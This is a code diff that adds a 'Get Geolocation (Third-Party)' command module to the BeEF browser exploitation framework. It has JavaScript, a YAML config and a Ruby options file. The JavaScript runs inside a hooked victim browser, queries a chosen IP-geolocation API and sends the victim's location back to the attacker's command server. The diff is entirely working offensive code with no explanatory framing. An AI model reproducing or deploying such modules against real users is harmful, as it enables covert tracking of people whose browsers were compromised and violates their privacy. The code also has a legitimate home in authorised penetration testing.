Add Get Geolocation (Third-Party) command module

modules/host/physical_location_thirdparty/command.js

@@ -0,0 +1,20 @@
+//
+// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var url = "<%= @api_url %>";
+  var timeout = 10000;
+
+  if (!beef.browser.hasCors()) {
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error());
+    return;
+  }
+
+  beef.net.cors.request('GET', url, '', timeout, function(response) {
+    beef.debug("[Get Physical Location (Third-Party] " + response.body);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=" + response.body, beef.are.status_success());
+  });
+});

modules/host/physical_location_thirdparty/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        physical_location_thirdparty:
+            enable: true
+            category: "Host"
+            name: "Get Geolocation (Third-Party)"
+            description: "This module retrieves the physical location of the hooked browser using third-party hosted geolocation APIs."
+            authors: ["bcoles"]
+            target:
+                working: "ALL"

modules/host/physical_location_thirdparty/module.rb

@@ -0,0 +1,37 @@
+#
+# Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Physical_location_thirdparty < BeEF::Core::Command
+  def self.options
+    return [{
+      'name'           => 'api_url',
+      'type'           => 'combobox',
+      'ui_label'       => 'API',
+      'store_type'     => 'arraystore',
+      'store_fields'   => ['api_url'],
+      'store_data'     =>
+      [
+        %w[http://ip-api.com/json],
+        %w[https://ip.nf/me.json],
+        %w[https://ipapi.co/json],
+        %w[https://geoip.tools/v1/json],
+        %w[https://geoip.nekudo.com/api/],
+        %w[https://extreme-ip-lookup.com/json/],
+        %w[http://www.geoplugin.net/json.gp],
+        %w[https://ipinfo.io/json]
+      ],
+      'emptyText'      => 'Select an API',
+      'valueField'     => 'api_url',
+      'displayField'   => 'api_url',
+      'mode'           => 'local',
+      'forceSelection' => 'false',
+      'autoWidth'      => true
+    }]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+end